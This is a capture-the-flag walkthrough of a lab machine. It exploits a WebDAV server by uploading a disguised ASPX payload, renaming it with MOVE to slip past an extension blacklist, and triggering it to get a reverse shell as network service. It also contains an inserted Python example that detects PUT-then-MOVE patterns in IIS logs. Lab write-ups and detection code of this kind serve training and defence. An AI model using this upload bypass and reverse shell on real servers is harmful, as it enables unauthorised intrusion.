WebDAV


The target web server has WebDAV enabled with some potentially dangerous methods allowed, and I found that I am allowed to upload files with a few extensions. Since some extensions are clearly blacklisted for security, I found a workaround: rename the uploaded file to an executable extension using WebDAV methods. Here, I will exploit this vulnerability by uploading an ASPX payload to the web server using the method described above.

dav:/> put shell.txt
uploading shell.txt to `/shell.txt':
progress: [=============================>] 100.0% of 2713 bytes succeeded.
dav:/> ls
listing collection `/': succeeded.
coll:   DavTestDir_cXKfKDSxLFfnvce             0  Apr  6 14:13
coll:   _private                               0  Apr 12  2017
coll:   _vti_bin                               0  Apr 12  2017
coll:   _vti_cnf                               0  Apr 12  2017
coll:   _vti_log                               0  Apr 12  2017
coll:   _vti_pvt                               0  Apr 12  2017
coll:   _vti_script                            0  Apr 12  2017
coll:   _vti_txt                               0  Apr 12  2017
coll:   aspnet_client                          0  Apr 12  2017
coll:   images                                 0  Apr 12  2017
        _vti_inf.html                       1754  Apr 12  2017
        iisstart.htm                        1433  Feb 21  2003
        pagerror.gif                        2806  Feb 21  2003
        postinfo.html                       2440  Apr 12  2017
        shell.txt                           2713  Apr  6 14:28

Uploading the payload. Notice that the payload has the TXT extension; the web server's WebDAV configuration wouldn't let me upload files with the ASPX extension directly.

As shown above, the shell.txt file has been uploaded. Now, I just need to change the extension to ASPX using the MOVE method.

dav:/> move shell.txt shell.aspx
moving `/shell.txt' to `/shell.aspx':  succeeded.

Done
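From the defender's side, the same PUT-then-MOVE sequence is visible in the web server's request log. The following Python is an added example and not part of the original write-up: it parses constructed IIS W3C-style log lines (a simplified field set, assumed here), flags a client that PUTs a file and then MOVEs the same path shortly afterwards, and counts WebDAV write methods per client.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed IIS W3C-style log lines (not from the original write-up).
# Simplified field set: date time c-ip cs-method cs-uri-stem sc-status
SAMPLE_LOG = """\
2024-04-06 14:27:50 10.10.14.2 PUT /shell.txt 201
2024-04-06 14:28:02 10.10.14.2 PROPFIND / 207
2024-04-06 14:30:11 10.10.14.2 MOVE /shell.txt 201
2024-04-06 14:30:20 10.10.14.2 GET /shell.aspx 200
2024-04-06 15:02:00 10.10.14.9 PUT /notes.txt 201
2024-04-06 15:04:10 10.10.14.9 GET /notes.txt 200
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\d+)$")
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}

def parse(log_text):
    """Yield (timestamp, client, method, path, status) per well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        yield ts, m.group(2), m.group(3), m.group(4), int(m.group(5))

def find_put_then_move(log_text, window_seconds=600):
    """Return (client, path, seconds) for each successful PUT followed by a
    successful MOVE of the same path from the same client within the window.
    IIS does not log the MOVE Destination header by default, so the rename
    target is unknown here; the PUT->MOVE pair itself is the signal."""
    puts, hits = {}, []
    for ts, client, method, path, status in parse(log_text):
        if status >= 300:
            continue
        if method == "PUT":
            puts[(client, path)] = ts
        elif method == "MOVE" and (client, path) in puts:
            delta = (ts - puts[(client, path)]).total_seconds()
            if delta <= window_seconds:
                hits.append((client, path, int(delta)))
    return hits

def write_method_counts(log_text):
    """Count WebDAV write methods per client; on a read-only site any count is notable."""
    counts = defaultdict(int)
    for _, client, method, _, _ in parse(log_text):
        if method in WRITE_METHODS:
            counts[client] += 1
    return dict(counts)
```

Against the constructed sample, only the first client is flagged for the rename pattern, while both appear in the write-method counts.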

┌──(kali㉿kali)-[~/archive/htb/labs/granny]
└─$ curl -s http://$IP/shell.aspx

Triggering the payload by requesting shell.aspx

┌──(kali㉿kali)-[~/archive/htb/labs/granny]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
 
c:\windows\system32\inetsrv> whoami
 whoami
nt authority\network service
 
c:\windows\system32\inetsrv> hostname
 hostname
granny
 
c:\windows\system32\inetsrv> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection:
 
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 10.10.10.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Initial foothold established on the target system as the nt authority\network service user by exploiting WebDAV. Interestingly, the hostname of the target system isn't grandpa, but granny.